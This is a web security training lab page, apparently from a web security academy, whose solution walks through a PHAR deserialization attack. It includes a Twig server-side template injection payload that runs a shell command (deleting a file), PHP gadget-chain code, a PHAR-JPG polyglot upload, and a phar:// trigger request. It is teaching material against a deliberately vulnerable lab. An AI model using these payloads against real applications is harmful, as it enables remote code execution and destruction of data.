Lab: Using PHAR deserialization to deploy a custom gadget chain

EXPERT

This lab does not explicitly use deserialization. However, if you combine PHAR deserialization with other advanced hacking techniques, you can still achieve remote code execution via a custom gadget chain.

To solve the lab, delete the morale.txt file from Carlos's home directory.

You can log in to your own account with the following credentials: wiener:peter

Access the lab

Solution

Observe that the website has a feature for uploading your own avatar, which only accepts JPG images. Upload a valid JPG as your avatar. Notice that it is loaded using GET /cgi-bin/avatar.php?avatar=wiener.
In Burp Repeater, request GET /cgi-bin to find an index that shows a Blog.php and CustomTemplate.php file. Obtain the source code by requesting the files using the .php~ backup extension.
Study the source code and identify the gadget chain involving the Blog->desc and CustomTemplate->lockFilePath attributes.
Notice that the file_exists() filesystem method is called on the lockFilePath attribute.
Notice that the website uses the Twig template engine. You can use deserialization to pass in an server-side template injection (SSTI) payload. Find a documented SSTI payload for remote code execution on Twig, and adapt it to delete Carlos's file:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}
Write a some PHP for creating a CustomTemplate and Blog containing your SSTI payload:
class CustomTemplate {} class Blog {} $object = new CustomTemplate; $blog = new Blog; $blog->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; $blog->user = 'user'; $object->template_file_path = $blog;
Create a PHAR-JPG polyglot containing your PHP script. You can find several scripts for doing this online (search for "phar jpg polyglot"). Alternatively, you can download our ready-made one.
Upload this file as your avatar.
In Burp Repeater, modify the request line to deserialize your malicious avatar using a phar:// stream as follows:
GET /cgi-bin/avatar.php?avatar=phar://wiener
Send the request to solve the lab.

Want to track your progress and have a more personalized learning experience? (It's free!)

In this topic

Insecure deserialization Exploiting insecure deserialization

All topics

SQL injection XSS CSRF Clickjacking DOM-based CORS XXE SSRF Request smuggling Command injection Server-side template injection Insecure deserialization Directory traversal Access control Authentication Web cache poisoning WebSockets

Lab: Using PHAR deserialization to deploy a custom gadget chain

Solution

In this topic

All topics

Find insecure deserialization vulnerabilities using Burp Suite